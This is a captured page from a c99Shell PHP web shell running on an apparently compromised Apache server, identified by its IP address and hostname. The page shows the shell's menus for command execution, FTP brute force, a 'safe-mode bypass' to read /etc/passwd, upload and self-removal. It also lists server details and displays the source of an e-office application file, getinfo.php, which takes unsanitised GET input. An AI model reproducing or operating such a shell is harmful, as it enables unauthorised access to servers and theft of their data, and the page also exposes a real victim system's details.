110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/directorBCNU/admin/ drwxr-xr-x Free 52.35 GB of 127.8 GB (40.96%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/ drwxr-xr-x
Free 52.35 GB of 127.8 GB (40.96%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: getinfo.php (2.19 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
header("content-type: application/x-javascript; charset=TIS-620");
?>
<script src="getinfo.js"></script>
<?
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../class/clsPerson.php";
include_once "getPrefix.php";
include_once "../class/clsDocSendtoPsTmp.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);
$oStmp=new DocSendToPsTmp($oC);
$oPS5 = new person($oC);

$q=$_GET["q"];
$del=$_GET["del"];
$DrsIDshow=$_GET["DrsIDshow"];
$DtPsID=$_GET["DtPsID"];
//$sendToPs=@$_GET["sendToPs"] or exit("No Info Selected"); 
$sendToPs=$_GET["sendToPs"];
$str2="";

	if($del!="1"){
		//Get Info From Selection
		if(isset($sendToPs)){
			foreach($sendToPs as $key){
				$oStmp->SearchByPsIDDrsID($key,$DrsIDshow);
				if($oStmp->GetRecord()==0){
					$oStmp->AddNew();
					$oStmp->DtPsID=$oStmp->GetNextCode();
					$oStmp->DrsID=$DrsIDshow;
					$oStmp->PsID=$key;
					$oStmp->Save();
				}
			}	
		}
	}else{
			$oStmp->SearchByDtPsID($DtPsID);
			$oStmp->GetRecord();
			$oStmp->Delete();
	}
	
	$str2.="<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" bgcolor=".$GLOBALS['COLOR_BG_TD_16'].">";
	$i=0;  $checkcountps=0;
	$oStmp->SearchByDrsID($DrsIDshow);
	while($oStmp->GetRecord()){
			$i++;
			$oPS5->SearchByKey($oStmp->PsID); $oPS5->GetRecord(); 
			$str2.="<tr><td width=\"83%\" height=22 bgcolor=".$GLOBALS["COLOR_BG_TD_16"].">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
			$str2.=GetPrefix($oPS5->prefixId).$oPS5->fName."&nbsp;".$oPS5->lName;
			$str2.="</td><td width=\"17%\" bgcolor=".$GLOBALS["COLOR_BG_TD_16"]." align=\"center\">";
			$str2.="<img src=\"../picture/cancel.gif\" alt=\"ź\"  border=\"0\"  style=\"cursor:pointer;\"  onclick=\"ShowInfo2(".$oStmp->DtPsID.",".$DrsIDshow.")\"></td></tr>";
			
	} 
	if($i==0){  
			$str2.="<tr><td  height=22 bgcolor=".$GLOBALS["COLOR_BG_TD_16"].">&nbsp;&nbsp;&nbsp;&nbsp;<strong>-</strong></td>";
			$str2.="<td  height=22 bgcolor=".$GLOBALS["COLOR_BG_TD_16"]." >&nbsp;</td></tr>";
	}  
	$str2.="</table>";
	$checkcountps=$i; 
	echo $str2;



?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]--